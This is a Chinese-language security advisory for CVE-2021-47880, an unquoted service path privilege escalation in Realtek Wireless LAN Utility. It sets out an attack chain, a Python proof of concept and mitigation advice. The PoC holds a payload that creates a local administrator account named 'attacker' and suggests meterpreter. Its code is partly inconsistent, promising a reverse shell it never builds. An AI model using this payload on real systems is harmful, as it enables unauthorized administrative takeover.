CVE-2021-47880 Realtek无线LAN Utility未引用服务路径提权漏洞

漏洞信息

漏洞编号

CVE-2021-47880

漏洞类型

未引用服务路径(Unquoted Service Path)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Realtek Wireless LAN Utility

漏洞概述

Realtek Wireless LAN Utility 700.1631版本存在未引用服务路径漏洞，该漏洞允许本地低权限用户利用Windows服务解析路径时的特性，通过在系统路径中植入恶意可执行文件，实现以SYSTEM级别权限执行任意代码。攻击者无需远程网络访问，必须具备目标系统的本地访问权限，可通过在服务启动时触发恶意代码执行来完成提权攻击。此漏洞影响所有使用该版本无线网卡驱动的Windows系统，攻击成功后将获得目标主机的完全控制权。

技术细节

未引用服务路径漏洞源于Windows服务可执行文件路径中包含空格但未被双引号包裹。当Windows服务启动时，服务控制管理器(SCM)使用CreateProcess函数执行服务程序，路径解析器会按空格分割路径并依次查找匹配的可执行文件。例如服务路径为C:\Program Files\Realtek\Wireless LAN Utility\rtkwlan.exe，Windows会依次尝试执行C:\Program.exe、C:\Program Files\Realtek.exe等。攻击者可将恶意可执行文件命名为Realtek.exe并放置在C:\Program Files\目录下，当服务启动时将首先执行恶意代码。攻击者需要创建名为Realtek.exe的恶意程序并放置在中间目录路径中，服务重启时即会以SYSTEM权限执行。

攻击链分析

STEP 1

1

攻击者获得目标系统的本地低权限访问权限

STEP 2

2

识别Realtek Wireless LAN Utility服务及其未引用的可执行文件路径

STEP 3

3

在C:\Program Files\目录下创建名为Realtek.exe的恶意可执行文件

STEP 4

4

等待服务重启、系统重启或触发服务重启的操作

STEP 5

5

Windows服务管理器解析路径时找到C:\Program Files\Realtek.exe并以SYSTEM权限执行

STEP 6

6

攻击者成功实现权限提升，获得目标系统的完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2021-47880 PoC - Malicious executable placement
# Save this as Realtek.exe and place in C:\Program Files\
# When Realtek Wireless LAN Utility service restarts, it will execute this file with SYSTEM privileges

import os
import sys
import shutil

def create_malicious_executable():
    """
    Create a malicious executable that will be placed in the unquoted path
    This creates a reverse shell payload for privilege escalation
    """
    
    # Target path for the malicious executable
    target_path = r'C:\Program Files\Realtek.exe'
    
    # Payload: Create a new user with admin privileges and add to Administrators group
    # This is a simple demonstration - in real attack, use meterpreter or other RAT
    payload_code = '''
import os
import subprocess

# Add new administrator user
try:
    # Create new user
    subprocess.run(['net', 'user', 'attacker', 'P@ssw0rd123', '/add'], capture_output=True)
    # Add to administrators group
    subprocess.run(['net', 'localgroup', 'Administrators', 'attacker', '/add'], capture_output=True)
    # Log the successful exploitation
    with open('C:\\Windows\\Temp\\privesc_log.txt', 'a') as f:
        f.write('[+] Privilege escalation successful via CVE-2021-47880\\n')
except Exception as e:
    pass
'''
    
    # For actual exploitation, compile to executable or use existing tools
    # This PoC demonstrates the concept
    print(f'[*] PoC for CVE-2021-47880')
    print(f'[*] This demonstrates placing malicious executable at unquoted service path')
    print(f'[*] Target: {target_path}')
    print(f'[*] In real attack, place compiled executable at this location')
    print(f'[*] Service: Realtek Wireless LAN Utility (rtkwlan.exe)')
    
    # Check if we can write to the target path (for demonstration)
    if os.path.exists(os.path.dirname(target_path)):
        print(f'[+] Directory exists, potential for exploitation')
    
    return target_path

def check_vulnerability():
    """
    Check if the system is vulnerable to CVE-2021-47880
    """
    service_path = r'C:\Program Files\Realtek\Wireless LAN Utility\rtkwlan.exe'
    
    # Check if service executable exists
    if os.path.exists(service_path):
        print(f'[+] Service executable found at: {service_path}')
        print(f'[+] System may be vulnerable to unquoted service path')
        return True
    else:
        print(f'[-] Service executable not found')
        return False

if __name__ == '__main__':
    check_vulnerability()

影响范围

Realtek Wireless LAN Utility <= 700.1631

防御指南

临时缓解措施

立即限制C:\Program Files\、C:\Program Files (x86)\等目录的写入权限，仅允许管理员和SYSTEM账户写入。联系Realtek获取官方修复补丁并尽快更新软件版本。监控安全日志中的异常服务启动行为，对可疑进程创建告警规则。